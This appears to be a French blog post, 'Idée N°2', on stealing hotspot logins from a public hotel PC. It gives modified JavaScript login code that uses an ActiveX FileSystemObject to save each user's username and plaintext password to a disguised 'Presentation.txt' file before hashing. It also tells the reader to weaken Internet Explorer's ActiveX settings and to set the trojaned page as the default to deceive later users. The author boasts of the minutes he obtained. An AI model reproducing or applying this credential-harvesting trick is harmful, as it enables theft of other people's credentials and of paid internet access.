Idées de hack .Idée N°2 : Hacker Un HOTSPOT en récupérons les Login et mot de passe

Dans cette deuxième idée je vais expliquer comment on peut récupérer les Login et mot de passe de connexion HotSpot sans snifing sans KeyLoger , pour se connecter à internet.

L’hôtel ibis Meknès met a la disposition des utilisateurs un PC de bureau avec internet explorer pour un tarif de 60 DH pour une demie heure et 100 DH l’heur qui est extrêmement chère quand l’accès a l information et a l’internet est nécessaire et indispensable.

Si vous n’avez pas de pc pour snifer les login et mot de passe qui sont dans ce cas précis cryptée a l’aide d un script JavaScript très utile pour crypter le mot de passe avant de l’envoyer . Il dispose de 4 fonction :

function hexMD5 (str)
function hexMD5w(str)
function b64MD5 (str)
function b64MD5w(str)
function calcMD5(str)

vous pouvez le télécharger sur : http://pajhome.org.uk/crypt/md5/3.0/md5-2.2alpha.js

L’idée est de stocker les informations d’authentification sur le pc lui-même et les récupérer âpres la connexion des utilisateurs qui son munie d un login et un mot de passe d’Access.

Comme je n ai pas d’outils à installer comme un Key loger j’ai décidé de

1. Enregistrer la page d’authentifications html
2. Modifier l’action Script du formulaire pour enregistrer les mots de passes avant de s’authentifier
3. Lancer la page comme page par défaut pour tromper les utilisateurs

Pour coder un script qui enregistre les données de la page web sur le bureau il faut activer les contrôle ActiveX sous internet explorer outil > option internet > sécurité > Personnaliser le niveau>Contrôle ACtiveX

Cette action est très déconseillée pour l’utilisation normal mais nécessaire pour exécuter a bien cette attaque.

Sur la Page d authentification on retrouve le code :

function doLogin() {
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155’ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037’);
document.sendin.submit();
}

Ce qui permet de coder le mot de passe avant de l’envoyer dans notre cas on va récupérer le mot de passe dans le fichier avant de le crypter donc on ajoute le code suivant avant l’envoi des informations

function doLogin() {

var fso=new ActiveXObject(« Scripting.FileSystemObject »); //Création du Système de fichier.
var otf=fso.OpenTextFile(« Presentation.txt », 8 ,true); //Ouverture du fichier « Presentation.txt »  //qu’on a cree sur le bureau pour ne pas attirer l’attention
otf.WriteLine(document.login.username.value); //Ecriture de la ligne « Login ».
otf.WriteLine(document.login.password.value); //Ecriture de la ligne « pass ».
otf.Close(); //Fermeture du fichier  » Presentation.txt »
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155’ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037’);
document.sendin.submit();
}

Après l’authentification on récupère le fichier et on test les Combinaison ou il reste encore du temps de connexion.

En ce qui me concerne il me reste 45 minutes